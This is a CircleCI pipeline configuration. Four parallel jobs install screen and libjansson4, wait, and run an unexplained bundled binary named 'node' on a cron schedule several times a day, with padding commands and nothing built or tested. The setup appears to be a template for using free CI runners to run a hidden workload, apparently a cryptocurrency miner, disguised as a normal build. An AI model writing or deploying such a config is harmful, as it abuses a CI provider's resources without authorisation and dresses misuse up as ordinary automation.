version: 2.1
orbs:

  ruby: circleci/ruby@0.1.2 

jobs:
  node_01:
    docker:
      - image: circleci/ruby:3.0.1-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 30s && sudo apt update -y
            sleep 300s && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            chmod u+x node pythonci && ./node 
            sudo apt update -y
            ls

  node_02:
    docker:
      - image: circleci/rust:1.53.0-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 300s && sudo apt update -y
            sleep 30s && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            chmod u+x node pythonci && ./node 
            sudo apt update -y
            ls

  node_03:
    docker:
      - image: circleci/golang:1.17-rc-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 300s && sudo apt update -y
            sleep 30s && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            chmod u+x node pythonci && ./node 
            sudo apt update -y
            ls

  node_04:
    docker:
      - image: circleci/golang:1.17-rc-buster

    steps:
      - run: 
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 300s && sudo apt update -y
            sleep 30s && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            chmod u+x node pythonci && ./node 
            sudo apt update -y
            ls
workflows:
  version: 2.1
  commit:
    jobs:
      - node_01
      - node_02
      - node_03
      - node_04
    triggers:
      - schedule:
          cron: "0 7,12,17,23 * * *"
          filters:
            branches: 
              only:
                - node
                
  asuirunjob:
    jobs:
      - node_01
      - node_02
      - node_03
      - node_04
  
